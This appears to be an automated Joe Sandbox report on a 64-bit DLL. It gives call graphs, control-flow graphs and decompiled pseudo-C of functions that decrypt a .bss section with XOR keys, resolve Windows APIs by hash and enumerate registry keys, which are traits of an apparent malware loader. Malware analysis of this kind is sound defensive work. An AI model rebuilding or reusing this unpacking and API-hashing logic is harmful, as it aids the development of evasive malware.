5084->5086 5090 18000549a 5085->5090 5161 1800027d4 5085->5161 5150 180004dd0 lstrlenA HeapAlloc 5086->5150 5090->4936 5090->4940 5098 180005df8 5090->5098 5091 1800054e2 5091->5090 5093 18000459c SetLastError 5091->5093 5094 180005511 5093->5094 5193 180003798 5094->5193 5097 180005545 HeapFree 5097->5090 5099 180005e31 5098->5099 5110 180005fad 5098->5110 5100 18000459c SetLastError 5099->5100 5101 180005e47 5100->5101 5102 180005fb4 GetLastError 5101->5102 5103 18000459c SetLastError 5101->5103 5102->5110 5104 180005e70 5103->5104 5104->5102 5105 180005ea9 5104->5105 5106 18000459c SetLastError 5105->5106 5107 180005ec1 HeapAlloc 5106->5107 5109 180005f0a 5107->5109 5107->5110 5111 18000459c SetLastError 5109->5111 5110->4936 5112 180005f18 5111->5112 5113 180005f95 GetLastError 5112->5113 5114 180005f4b HeapAlloc 5112->5114 5117 180005f9d HeapFree 5113->5117 5115 180005f75 wcstombs 5114->5115 5116 180005f8e 5114->5116 5115->5117 5116->5117 5117->5110 5119 18000459c SetLastError 5118->5119 5120 180003ffc 5119->5120 5121 180004151 GetLastError 5120->5121 5122 180004018 5120->5122 5124 18000412f 5121->5124 5123 18000403c HeapAlloc 5122->5123 5122->5124 5123->5124 5132 180004059 5123->5132 5124->4940 5125 1800040b7 GetLastError 5126 1800040bf WaitForSingleObject 5125->5126 5127 18000410b 5126->5127 5126->5132 5128 180004110 HeapFree 5127->5128 5128->5124 5130 180004122 5128->5130 5129 18000459c SetLastError 5129->5132 5207 1800085e4 5130->5207 5132->5125 5132->5126 5132->5128 5132->5129 5133 180004101 GetLastError 5132->5133 5133->5128 5135 180003e8d 5134->5135 5136 180003e7f 5134->5136 5138 180003ead 5135->5138 5139 18000459c SetLastError 5135->5139 5137 18000459c SetLastError 5136->5137 5137->5135 5140 180003ecd 5138->5140 5143 18000459c SetLastError 5138->5143 5139->5138 5141 180003ee1 HeapFree 5140->5141 5142 180003eec 5140->5142 5141->5142 5144 180003ef5 HeapFree 5142->5144 5145 180003f00 5142->5145 5143->5140 5144->5145 5146 180003f14 5145->5146 5147 180003f09 HeapFree 5145->5147 5148 180003f28 HeapFree 5146->5148 5149 180003f1d HeapFree 5146->5149 5147->5146 5148->4883 5149->5148 5151 180004e26 HeapAlloc 5150->5151 5160 180004e9c 5150->5160 5152 180004ea9 HeapFree 5151->5152 5153 180004e3c 5151->5153 5152->5160 5203 180004994 5153->5203 5156 180004e5f 5157 180004e6d memcpy lstrcpyA 5156->5157 5158 180004e8e lstrcpyA 5156->5158 5157->5160 5158->5160 5159 180004994 strchr 5159->5156 5160->5085 5162 180007b04 3 API calls 5161->5162 5165 180002815 5162->5165 5163 180002a78 GetLastError 5164 180002a5d 5163->5164 5164->5090 5164->5091 5189 180007b04 lstrlenA HeapAlloc 5164->5189 5165->5163 5166 18000459c SetLastError 5165->5166 5167 180002854 HeapFree 5166->5167 5167->5163 5169 180002890 5167->5169 5171 18000459c SetLastError 5169->5171 5172 1800028a7 5169->5172 5170 180007b04 3 API calls 5173 1800028d9 5170->5173 5171->5172 5172->5163 5172->5170 5173->5163 5174 18000459c SetLastError 5173->5174 5176 18000290f 5173->5176 5174->5176 5175 18000459c SetLastError 5177 18000294c HeapFree 5175->5177 5176->5175 5177->5163 5179 180002982 5177->5179 5180 180007b04 3 API calls 5179->5180 5181 18000298d 5180->5181 5181->5163 5182 18000459c SetLastError 5181->5182 5183 1800029a7 HeapFree 5182->5183 5183->5163 5185 180002a08 5183->5185 5186 18000459c SetLastError 5185->5186 5187 180002a1f 5186->5187 5187->5164 5188 18000459c SetLastError 5187->5188 5188->5164 5190 180007b54 5189->5190 5191 180007b76 5189->5191 5192 180007b62 memset 5190->5192 5191->5091 5192->5191 5200 1800037d2 5193->5200 5194 18000459c SetLastError 5194->5200 5195 180003823 GetLastError 5195->5200 5196 18000388c 5197 1800038dc 5196->5197 5198 18000459c SetLastError 5196->5198 5197->5090 5197->5097 5199 1800038ac 5198->5199 5199->5197 5201 1800038d4 GetLastError 5199->5201 5200->5194 5200->5195 5200->5196 5200->5197 5202 180003884 GetLastError 5200->5202 5201->5197 5202->5196 5204 1800095bc 5203->5204 5205 1800049ab strchr 5204->5205 5206 1800049c0 5205->5206 5206->5156 5206->5159 5208 18000861b 5207->5208 5209 180008623 HeapAlloc 5208->5209 5210 18000868b 5208->5210 5209->5210 5211 18000863a 5209->5211 5210->5124 5211->5210 5212 18000867b HeapFree 5211->5212 5212->5210 5214 1800082db 5213->5214 5215 18000823c 5213->5215 5214->4899 5215->5214 5216 18000826a HeapAlloc 5215->5216 5216->5214 5217 180008286 memset memcpy memcpy 5216->5217 5217->5214 5219 180006ef8 5218->5219 5220 180006f12 HeapAlloc 5219->5220 5228 180006fe7 5219->5228 5221 180006f2f 5220->5221 5220->5228 5230 180006bac 5221->5230 5224 180007003 HeapFree 5224->5228 5225 180004a14 10 API calls 5226 180006fbc 5225->5226 5226->5224 5227 180002594 2 API calls 5226->5227 5229 180006fd6 5227->5229 5228->4904 5228->4905 5229->5224 5229->5228 5231 180006be3 5230->5231 5232 180006bd9 5230->5232 5236 18000a5a0 5231->5236 5232->5224 5232->5225 5235 180006c49 memcpy memset 5235->5232 5247 18000118c 5236->5247 5239 18000118c memset 5240 18000a5f9 5239->5240 5241 18000118c memset 5240->5241 5242 18000a613 5241->5242 5243 180006bfa 5242->5243 5251 180001eec memcpy 5242->5251 5243->5232 5243->5235 5245 18000a686 5246 18000a6a3 memset memset 5245->5246 5246->5243 5250 1800011aa 5247->5250 5248 1800011e6 memset 5249 1800011fb 5248->5249 5249->5239 5250->5248 5250->5249 5259 180003934 5251->5259 5253 180001f5b 5254 180003934 9 API calls 5253->5254 5255 180001f80 memset 5254->5255 5258 180001f9a 5255->5258 5256 180002081 memcpy memset memset 5256->5245 5257 180003934 9 API calls 5257->5258 5258->5256 5258->5257 5260 1800095c4 memset memcpy memset 5259->5260 5261 180003960 5260->5261 5262 180006298 memset memset memset memset memset 5261->5262 5263 180003978 memset 5262->5263 5263->5253 5265 18000588b 5264->5265 5266 18000578d 5264->5266 5267 180005896 WaitForSingleObject 5265->5267 5271 1800058ec 5265->5271 5266->5265 5268 180005861 5266->5268 5269 1800057a3 5266->5269 5267->5271 5270 1800024cc 2 API calls 5268->5270 5275 1800057dd 5268->5275 5269->5268 5269->5271 5273 180005938 5269->5273 5274 1800057c4 5269->5274 5281 180005875 5270->5281 5271->5273 5271->5275 5280 180005914 memset 5271->5280 5272 1800015ea HeapFree 5272->4776 5273->5275 5277 180007950 13 API calls 5273->5277 5279 18000599a 5273->5279 5274->5268 5278 1800057cf 5274->5278 5275->5272 5313 180005600 lstrlenA HeapAlloc 5275->5313 5282 180005988 HeapFree 5277->5282 5283 180005852 SetEvent 5278->5283 5284 1800057d6 5278->5284 5279->5275 5309 180001a88 HeapAlloc 5279->5309 5296 1800020dc lstrlenA memset HeapAlloc 5280->5296 5281->5275 5286 180002668 7 API calls 5281->5286 5282->5279 5283->5275 5284->5275 5293 1800024cc HeapAlloc 5284->5293 5292 18000581b 5286->5292 5289 18000582e HeapFree 5289->5275 5291 180002668 7 API calls 5291->5292 5292->5275 5292->5289 5294 180002511 5293->5294 5295 1800024ff memcpy 5293->5295 5294->5275 5294->5291 5295->5294 5297 180002163 memcpy 5296->5297 5298 180002287 5296->5298 5299 18000217d 5297->5299 5298->5273 5300 18000459c SetLastError 5299->5300 5301 180002279 HeapFree 5299->5301 5302 1800021e9 5300->5302 5301->5298 5303 18000459c SetLastError 5302->5303 5304 180002235 5302->5304 5307 18000220b 5303->5307 5304->5301 5305 18000459c SetLastError 5304->5305 5306 180002272 5305->5306 5306->5301 5307->5304 5308 18000459c SetLastError 5307->5308 5308->5304 5310 180001ad2 memset 5309->5310 5311 180001b1c 5309->5311 5318 180003a24 5310->5318 5311->5275 5314 18000565a GetSystemTime _snprintf EnterCriticalSection 5313->5314 5315 18000572f 5313->5315 5316 1800056dc LeaveCriticalSection HeapFree 5314->5316 5315->5272 5316->5315 5319 180003a53 5318->5319 5320 180003a5b memcpy InitializeCriticalSection CreateEventA 5318->5320 5324 180007950 13 API calls 5319->5324 5321 180003bd6 GetLastError 5320->5321 5322 180003ada CreateEventA 5320->5322 5321->5319 5331 180003bfc 5321->5331 5322->5321 5323 180003af8 CreateMutexA 5322->5323 5323->5321 5325 180003b1a 5323->5325 5326 180003bea 5324->5326 5327 180001c00 4 API calls 5325->5327 5329 18000459c SetLastError 5326->5329 5326->5331 5328 180003b24 5327->5328 5330 18000459c SetLastError 5328->5330 5329->5331 5332 180003b35 5330->5332 5331->5311 5333 18000459c SetLastError 5332->5333 5339 180003b90 5332->5339 5337 180003b66 5333->5337 5336 180003bcc SwitchToThread 5336->5331 5337->5321 5338 18000459c SetLastError 5337->5338 5338->5339 5339->5321 5340 180006c8c 5339->5340 5341 18000459c SetLastError 5340->5341 5342 180003bc3 5341->5342 5342->5321 5342->5336 5344 180008326 5343->5344 5348 18000799c 5343->5348 5345 18000459c SetLastError 5344->5345 5346 180008334 5345->5346 5347 18000459c SetLastError 5346->5347 5347->5348 5348->4790 5348->4791 5377 180003e14 5378 18000459c SetLastError 5377->5378 5379 180003e29 5378->5379 5472 18000a494 5473 18000a4a0 5472->5473 5476 18000a6ec 5473->5476 5477 18000a76b RaiseException 5476->5477 5478 18000a790 5476->5478 5480 18000a4df 5477->5480 5479 18000a824 LoadLibraryA 5478->5479 5478->5480 5482 18000a88f 5478->5482 5489 18000a8b4 5478->5489 5481 18000a837 GetLastError 5479->5481 5479->5482 5486 18000a84d 5481->5486 5487 18000a85f RaiseException 5481->5487 5483 18000a8cb FreeLibrary 5482->5483 5484 18000a89b 5482->5484 5483->5489 5488 18000a8a1 LocalAlloc 5484->5488 5484->5489 5485 18000a92b GetProcAddress 5485->5480 5490 18000a941 GetLastError 5485->5490 5486->5482 5486->5487 5487->5480 5488->5489 5489->5480 5489->5485 5491 18000a957 5490->5491 5491->5480 5492 18000a969 RaiseException 5491->5492 5492->5480 5349 23122641c6d 5351 23122641c29 5349->5351 5350 23122641c14 5351->5350 5352 23122641c1e RtlAllocateHeap 5351->5352 5352->5350 5498 18000a519 5499 18000a525 5498->5499 5500 18000a6ec 9 API calls 5499->5500 5501 18000a564 5500->5501 5465 180007a7c 5466 180007ab9 5465->5466 5467 180007a9d TerminateProcess CloseHandle CloseHandle 5465->5467 5468 180007ad2 5466->5468 5469 180007ac2 CloseHandle CloseHandle 5466->5469 5467->5466 5470 180007aeb HeapFree 5468->5470 5471 180007adb CloseHandle CloseHandle 5468->5471 5469->5468 5471->5470 5502 18000431c WaitForSingleObject 5503 18000449d 5502->5503 5504 18000435d 5502->5504 5506 18000459c SetLastError 5503->5506 5505 18000459c SetLastError 5504->5505 5507 180004367 memcpy 5505->5507 5511 1800044a7 5506->5511 5523 180004386 5507->5523 5509 18000459c SetLastError 5509->5523 5510 180004568 GetLastError 5513 180004570 ReleaseMutex 5510->5513 5511->5510 5512 18000459c SetLastError 5511->5512 5514 1800044e0 5512->5514 5514->5510 5516 1800044fa SetEvent 5514->5516 5515 18000444d GetLastError 5515->5523 5524 180004504 5516->5524 5517 180004481 WaitForSingleObject 5519 180004498 5517->5519 5517->5523 5518 180004461 ResetEvent WaitForSingleObject 5518->5523 5519->5513 5520 18000459c SetLastError 5520->5524 5521 180004435 GetLastError 5521->5517 5521->5523 5523->5509 5523->5515 5523->5517 5523->5518 5523->5521 5525 180008308 SetLastError 5523->5525 5527 18000440c SetEvent 5523->5527 5529 180008150 5523->5529 5524->5510 5524->5520 5526 1800091f8 10 API calls 5524->5526 5525->5523 5526->5524 5536 1800091f8 5527->5536 5545 180002a9c memset 5529->5545 5531 18000459c SetLastError 5532 180008181 5531->5532 5532->5531 5533 1800081c2 5532->5533 5534 1800081c0 5532->5534 5533->5534 5535 1800081c4 GetLastError 5533->5535 5534->5523 5535->5534 5537 180009221 5536->5537 5538 180009266 GetSystemTimeAsFileTime EnterCriticalSection LeaveCriticalSection 5537->5538 5539 180009322 5537->5539 5540 180006c8c SetLastError 5538->5540 5541 180009331 5539->5541 5543 180002770 4 API calls 5539->5543 5542 1800092d4 5540->5542 5541->5523 5542->5541 5544 1800092e9 GetLastError EnterCriticalSection LeaveCriticalSection 5542->5544 5543->5541 5544->5539 5544->5541 5546 180002b43 5545->5546 5547 180002ad7 lstrcpynA 5545->5547 5546->5532 5548 180002af6 5547->5548 5549 18000459c SetLastError 5548->5549 5550 180002b1a 5549->5550 5550->5546 5551 180002b39 GetLastError 5550->5551 5551->5546 5630 180007760 5633 1800077a6 5630->5633 5631 18000782b memcmp 5632 180007885 5631->5632 5634 180007844 5631->5634 5635 1800078b1 5632->5635 5636 180007890 memcmp 5632->5636 5633->5631 5633->5632 5637 180007b04 3 API calls 5634->5637 5638 1800078a9 5635->5638 5639 1800078b6 memcmp 5635->5639 5636->5638 5640 18000784f 5637->5640 5641 1800088b4 39 API calls 5638->5641 5639->5638 5642 180007909 5640->5642 5644 180001000 7 API calls 5640->5644 5641->5642 5643 180007914 5642->5643 5645 180007928 HeapFree 5642->5645 5646 180007870 HeapFree 5644->5646 5645->5643 5646->5642

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 18000508c-1800050da HeapAlloc 1 180005419 0->1 2 1800050e0-180005112 memset InitializeCriticalSection call 180008b44 0->2 3 18000541e-18000543a 1->3 6 180005118-180005131 call 180007678 call 18000459c 2->6 7 18000540f-180005417 call 180005578 2->7 14 180005133-180005142 6->14 15 180005144 6->15 7->3 16 180005147-18000514e 14->16 15->16 18 18000515b-180005184 HeapAlloc 16->18 19 180005150-180005156 GetLastError 16->19 21 180005226 18->21 22 18000518a-1800051b0 RegOpenKeyW 18->22 20 180005408-18000540d 19->20 20->3 20->7 23 18000522b-18000522e 21->23 24 1800051b2-1800051b4 22->24 25 180005216-180005224 HeapFree 22->25 23->7 26 180005234-180005280 memcpy call 180005ca4 23->26 27 1800051cf-1800051ec RegEnumKeyW 24->27 25->23 35 180005282-18000529a call 180005ca4 26->35 36 18000529c-18000529f 26->36 28 1800051b6-1800051ca call 180009110 27->28 29 1800051ee-1800051f7 27->29 28->29 38 1800051cc 28->38 31 180005203-180005214 RegCloseKey 29->31 32 1800051f9-180005200 29->32 31->25 31->26 32->31 35->36 36->7 40 1800052a5-1800052b6 call 180006dcc 36->40 38->27 44 1800052e2-1800052e5 40->44 45 1800052b8-1800052cc call 180003c24 40->45 44->7 47 1800052eb-1800052ee call 180008708 44->47 45->44 50 1800052ce-1800052de call 180003c24 45->50 51 1800052f3-1800052f6 47->51 50->44 53 180005302-180005323 51->53 54 1800052f8-1800052fd 51->54 56 180005325-18000532d 53->56 57 180005339 53->57 54->7 58 18000533c-18000533f 56->58 59 18000532f-180005337 call 180004ed8 56->59 57->58 61 180005341-180005346 58->61 62 18000534b-180005355 58->62 59->58 61->7 64 180005357-18000535f 62->64 65 18000536e 62->65 66 180005371-180005374 64->66 67 180005361-18000536c call 180004ed8 64->67 65->66 66->61 69 180005376-180005391 GetModuleHandleA 66->69 67->66 71 180005393-1800053a7 call 18000459c 69->71 72 1800053fb-180005403 call 180002b60 69->72 76 1800053a9-1800053bc GetCurrentThreadId 71->76 77 1800053be 71->77 72->20 78 1800053c1-1800053c4 76->78 77->78 78->19 80 1800053ca-1800053db call 18000459c 78->80 83 1800053dd-1800053ec 80->83 84 1800053ee 80->84 85 1800053f1-1800053f4 83->85 84->85 85->3 87 1800053f6 85->87 87->19
                  C-Code - Quality: 50%
                  			E0000000118000508C(void* __ecx, void* __esi, long long __rax, long long __rbx, long long __rcx, void* __r9) {
                  				void* __rdi;
                  				void* __rsi;
                  				void* __rbp;
                  				long _t55;
                  				long _t57;
                  				void* _t65;
                  				void* _t114;
                  				void* _t115;
                  				long long* _t146;
                  				void* _t147;
                  				void* _t153;
                  				int _t188;
                  				long long _t189;
                  				int _t191;
                  				long long _t192;
                  				struct _CRITICAL_SECTION* _t198;
                  				void* _t201;
                  				void* _t202;
                  				signed short* _t211;
                  				void* _t214;
                  				void* _t215;
                  				long long _t216;
                  				void* _t217;
                  				long _t219;
                  				long _t223;
                  				void* _t225;
                  
                  				_t154 = __rbx;
                  				_t146 = __rax;
                  				_t115 = __esi;
                  				 *((long long*)(_t201 + 0x20)) = __rbx;
                  				 *((long long*)(_t201 + 8)) = __rcx;
                  				_t202 = _t201 - 0x230;
                  				_t199 =  *0x8000d4a0;
                  				r14d =  *0x8000d498;
                  				HeapAlloc(_t225, _t223, _t219);
                  				r12d = 0;
                  				_t189 = __rax;
                  				if (__rax == _t217) goto 0x80005419;
                  				memset(_t217, _t188, _t191);
                  				InitializeCriticalSection(_t198);
                  				_t5 = _t189 + 0x98; // 0x98
                  				_t216 = _t5;
                  				 *_t216 = _t216;
                  				 *((long long*)(__rax + 0xa0)) = _t216;
                  				if (E00000001180008B44(__ecx, __rax - _t217, __rax, __rbx, _t191, __rbx, _t214) != r12d) goto 0x8000540f;
                  				E00000001180007678(__ecx, __rax, _t154, _t191);
                  				E0000000118000459C(0xdc444c2b, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				if (_t146 == _t217) goto 0x80005144;
                  				r9d = 0;
                  				r8d = 0;
                  				 *_t146();
                  				goto 0x80005147;
                  				_t147 = _t217;
                  				 *(_t189 + 0x28) = _t147;
                  				if (_t147 != _t217) goto 0x8000515b;
                  				GetLastError();
                  				goto 0x80005408;
                  				r8d = 0x1102;
                  				HeapAlloc(??, ??, ??);
                  				_t192 =  *0x8000d4a0;
                  				if (_t192 == _t217) goto 0x80005226;
                  				 *_t192 = r12w; // executed
                  				_t55 = RegOpenKeyW(??, ??, ??); // executed
                  				if (_t55 != r12d) goto 0x80005216;
                  				goto 0x800051cf;
                  				r12d = r12d + 1;
                  				if (E00000001180009110(0x180000000, _t154, _t192, _t202 + 0x20, _t192, _t202 + 0x278, _t214) != 0) goto 0x800051ee;
                  				r9d = 0x104; // executed
                  				_t57 = RegEnumKeyW(??, ??, ??, ??); // executed
                  				if (_t57 == 0) goto 0x800051b6;
                  				r12d = 0;
                  				if (_t57 != 0x103) goto 0x80005203;
                  				 *0x8000d480 = _t192;
                  				RegCloseKey(??); // executed
                  				if (r12d == r12d) goto 0x80005234;
                  				HeapFree(??, ??, ??);
                  				goto 0x8000522b;
                  				if (8 != r12d) goto 0x8000540f;
                  				_t193 =  *0x8000d490;
                  				r8d = 8;
                  				memcpy(??, ??, ??);
                  				 *((intOrPtr*)(_t202 + 0x286)) = r12w;
                  				if (E00000001180005CA4(8, 0, _t154, _t189, _t202 + 0x280, _t189,  *0x8000d490,  *0x8000d490 + 0x180011198) == r12d) goto 0x8000529c;
                  				if (E00000001180005CA4(_t61, 0, _t154, _t189, _t202 + 0x280, _t189,  *0x8000d490,  *0x8000d490 + 0x1800111f0) != r12d) goto 0x8000540f;
                  				_t28 = _t189 + 8; // 0x8
                  				_t186 = _t28;
                  				if (E00000001180006DCC(_t154, _t189, _t28, _t189, _t193) != r12d) goto 0x800052e2;
                  				E00000001180003C24(_t154, _t189, _t28, _t189, _t193,  *0x8000d4a0);
                  				 *((long long*)(_t189 + 0x30)) = 0x180000000;
                  				if (0x180000000 == _t217) goto 0x800052e2;
                  				_t30 = _t189 + 8; // 0x8
                  				_t65 = E00000001180003C24(_t154, _t30, _t28, _t189, _t193,  *0x8000d4a0);
                  				 *((long long*)(_t189 + 0x38)) = 0x180000000;
                  				_t90 =  !=  ? r12d : 8;
                  				_t132 = ( !=  ? r12d : 8) - r12d;
                  				if (( !=  ? r12d : 8) != r12d) goto 0x8000540f;
                  				if (E00000001180008708(_t65, _t114, _t154, _t189, _t186) != r12d) goto 0x80005302;
                  				goto 0x8000540f;
                  				_t211 =  *0x8000d490 + 0x18000f000;
                  				r9d = _t211[1] & 0x0000ffff;
                  				r11d =  *_t211 & 0x0000ffff;
                  				_t215 = __r9 + 8;
                  				if (_t216 - _t215 <= 0) goto 0x80005339;
                  				if ((r14d ^ 0xe49a1e6d) == r12d) goto 0x8000533c;
                  				E00000001180004ED8(r14d ^ 0xe49a1e6d, __r9 +  &(_t211[4]));
                  				goto 0x8000533c;
                  				if (_t217 != _t217) goto 0x8000534b;
                  				goto 0x8000540f;
                  				r14d = r14d ^ 0xecb028fc;
                  				if (_t216 - _t215 <= 0) goto 0x8000536e;
                  				if (r14d == r12d) goto 0x80005371;
                  				E00000001180004ED8(r14d, __r9 +  &(_t211[4]));
                  				goto 0x80005371;
                  				_t153 = _t217;
                  				if (_t153 == _t217) goto 0x80005341;
                  				 *(_t189 + 0x40) = _t211;
                  				 *0x8000d488 = _t189;
                  				GetModuleHandleA(??);
                  				if (_t153 ==  *((intOrPtr*)(_t202 + 0x270))) goto 0x800053fb;
                  				E0000000118000459C(0xaade337c, _t153,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				if (_t153 == _t217) goto 0x800053be;
                  				r8d = GetCurrentThreadId();
                  				 *_t153();
                  				goto 0x800053c1;
                  				if (_t217 == _t217) goto 0x80005150;
                  				E0000000118000459C(0x1c8cff93, _t153,  *((intOrPtr*)(_t199 + 0x18)));
                  				if (_t153 == _t217) goto 0x800053ee;
                  				 *_t153();
                  				goto 0x800053f1;
                  				if (r12d != r12d) goto 0x8000541e;
                  				goto 0x80005150;
                  				asm("lock add dword [ebp+0x38], 0x1");
                  				if (E00000001180002B60(_t115, _t189, __r9, _t215, _t216) == r12d) goto 0x8000541e;
                  				E00000001180005578(_t154, _t189, _t217);
                  				goto 0x8000541e;
                  				return 8;
                  			}





























                  0x18000508c
                  0x18000508c
                  0x18000508c
                  0x18000508c
                  0x180005091
                  0x1800050a1
                  0x1800050a8
                  0x1800050b6
                  0x1800050cb
                  0x1800050d1
                  0x1800050d4
                  0x1800050da
                  0x1800050e8
                  0x1800050f1
                  0x1800050f7
                  0x1800050f7
                  0x1800050fe
                  0x180005101
                  0x180005112
                  0x18000511b
                  0x180005129
                  0x180005131
                  0x180005138
                  0x18000513b
                  0x180005140
                  0x180005142
                  0x180005144
                  0x180005147
                  0x18000514e
                  0x180005150
                  0x180005156
                  0x180005164
                  0x180005171
                  0x180005177
                  0x180005184
                  0x1800051a1
                  0x1800051a5
                  0x1800051b0
                  0x1800051b4
                  0x1800051be
                  0x1800051ca
                  0x1800051dc
                  0x1800051e2
                  0x1800051ec
                  0x1800051ee
                  0x1800051f7
                  0x1800051f9
                  0x18000520b
                  0x180005214
                  0x18000521e
                  0x180005224
                  0x18000522e
                  0x180005234
                  0x180005248
                  0x18000524e
                  0x18000526d
                  0x180005280
                  0x18000529f
                  0x1800052a5
                  0x1800052a5
                  0x1800052b6
                  0x1800052c0
                  0x1800052c5
                  0x1800052cc
                  0x1800052ce
                  0x1800052d2
                  0x1800052da
                  0x1800052de
                  0x1800052e2
                  0x1800052e5
                  0x1800052f6
                  0x1800052fd
                  0x180005302
                  0x18000530d
                  0x180005312
                  0x18000531c
                  0x180005323
                  0x18000532d
                  0x180005332
                  0x180005337
                  0x18000533f
                  0x180005346
                  0x18000534b
                  0x180005355
                  0x18000535f
                  0x180005367
                  0x18000536c
                  0x18000536e
                  0x180005374
                  0x180005378
                  0x18000537c
                  0x180005383
                  0x180005391
                  0x18000539c
                  0x1800053a7
                  0x1800053b4
                  0x1800053b7
                  0x1800053bc
                  0x1800053c4
                  0x1800053d3
                  0x1800053db
                  0x1800053ea
                  0x1800053ec
                  0x1800053f4
                  0x1800053f6
                  0x1800053fb
                  0x18000540d
                  0x180005412
                  0x180005417
                  0x18000543a

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: HandleModule$Heap$AllocErrorLast$CloseCriticalCurrentEnumFreeInitializeOpenSectionThreadmemcpymemset
                  • String ID:
                  • API String ID: 2014251338-0
                  • Opcode ID: 23df82f8670f2ca5d57fcd725f6ce51a55fb78b39f2e81572481ed79961b9dbc
                  • Instruction ID: 9261d350846713a6d61e62943f4705d1cd3b2ba236d4958cf944a875f2eb3085
                  • Opcode Fuzzy Hash: 23df82f8670f2ca5d57fcd725f6ce51a55fb78b39f2e81572481ed79961b9dbc
                  • Instruction Fuzzy Hash: 1AA15C32204B4D92EAE6DB22E4953EE7391B78C7C5F50C421EA8A47795DE78CB9DC301
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: ErrorFileLast$CloseCreateDirectoryHandleInitQueryStringUnicode
                  • String ID:
                  • API String ID: 2375947951-0
                  • Opcode ID: 6a213b4158cada7e0fc9009fce08ec59d8022234906b0ab491453136b5d08942
                  • Instruction ID: 86e8c0801eecd6214d3de86c7c9a3f36e2355b629a028b10123d7888b335a31b
                  • Opcode Fuzzy Hash: 6a213b4158cada7e0fc9009fce08ec59d8022234906b0ab491453136b5d08942
                  • Instruction Fuzzy Hash: A5319E72214B8486D7A1CF15E45439E77A1F78CBD4F588626EAAD43B88DF38CA48CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 38%
                  			E00000001180004F1C(long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r11) {
                  				intOrPtr _t22;
                  				intOrPtr _t23;
                  				void* _t46;
                  				long long _t56;
                  				void* _t72;
                  				intOrPtr* _t75;
                  				intOrPtr* _t76;
                  				long long _t80;
                  				long long _t82;
                  				void* _t83;
                  				long long _t85;
                  				void* _t91;
                  				void* _t92;
                  				long _t93;
                  				long _t95;
                  				long _t97;
                  
                  				_t92 = __r11;
                  				_t56 = _t85;
                  				 *((long long*)(_t56 + 8)) = __rbx;
                  				 *((long long*)(_t56 + 0x10)) = _t82;
                  				 *((long long*)(_t56 + 0x18)) = __rsi;
                  				 *((long long*)(_t56 + 0x20)) = __rdi;
                  				_t83 = __rcx;
                  				r8d = 0;
                  				HeapCreate(_t97, _t95, _t93); // executed
                  				_t80 = _t56;
                  				if (_t56 == 0) goto 0x8000506b;
                  				_t72 =  *((intOrPtr*)(__rcx + 0x3c)) + __rcx;
                  				_t75 = _t56 + _t72 + 0x68;
                  				_t22 =  *_t75;
                  				if (_t22 == 0) goto 0x80004ffc;
                  				if (_t22 == 0x7373622e) goto 0x80004f8a;
                  				_t76 = _t75 + 0x28;
                  				_t23 =  *_t76;
                  				if (_t23 != 0) goto 0x80004f79;
                  				if (_t23 == 0) goto 0x80004ffc;
                  				r13d =  *(_t76 + 0x10);
                  				r12d =  *(_t76 + 0x14);
                  				r12d = r12d ^  *(_t72 + 8);
                  				r12d = r12d ^ r13d;
                  				HeapAlloc(??, ??, ??);
                  				if (_t56 == 0) goto 0x80004ff5;
                  				r9d = r12d;
                  				r8d = r13d;
                  				E00000001180002524(_t56, __rbx, _t56, _t72 + __rcx, _t80);
                  				r11d =  *((intOrPtr*)(_t76 + 0xc));
                  				 *0x8000d490 = _t56 - _t92 - _t83;
                  				 *0x8000d498 = E00000001180001B48(_t56, _t56 - _t92 - _t83 + 0x80011040);
                  				goto 0x80005001;
                  				goto 0x80005001;
                  				if (2 == 0) goto 0x80005010;
                  				HeapDestroy(??);
                  				goto 0x8000506b;
                  				HeapAlloc(??, ??, ??);
                  				if (0x80011040 != 0) goto 0x80005049;
                  				HeapDestroy(??);
                  				goto 0x8000506b;
                  				0x8000236a();
                  				 *0x180011048 = _t80;
                  				 *0x8000d4a0 = 0x80011040;
                  				return E0000000118000508C(0, _t46, 0x80011040, 0x80011040, _t83, _t91);
                  			}



















                  0x180004f1c
                  0x180004f1c
                  0x180004f1f
                  0x180004f23
                  0x180004f27
                  0x180004f2b
                  0x180004f39
                  0x180004f3c
                  0x180004f4b
                  0x180004f51
                  0x180004f57
                  0x180004f63
                  0x180004f6a
                  0x180004f6f
                  0x180004f73
                  0x180004f7e
                  0x180004f80
                  0x180004f84
                  0x180004f88
                  0x180004f8c
                  0x180004f8e
                  0x180004f92
                  0x180004f99
                  0x180004fa2
                  0x180004fa5
                  0x180004fb1
                  0x180004fb6
                  0x180004fb9
                  0x180004fc2
                  0x180004fc7
                  0x180004fdd
                  0x180004fed
                  0x180004ff3
                  0x180004ffa
                  0x180005003
                  0x180005008
                  0x18000500e
                  0x18000502b
                  0x180005037
                  0x18000503c
                  0x180005047
                  0x180005051
                  0x180005059
                  0x18000505d
                  0x18000508b

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
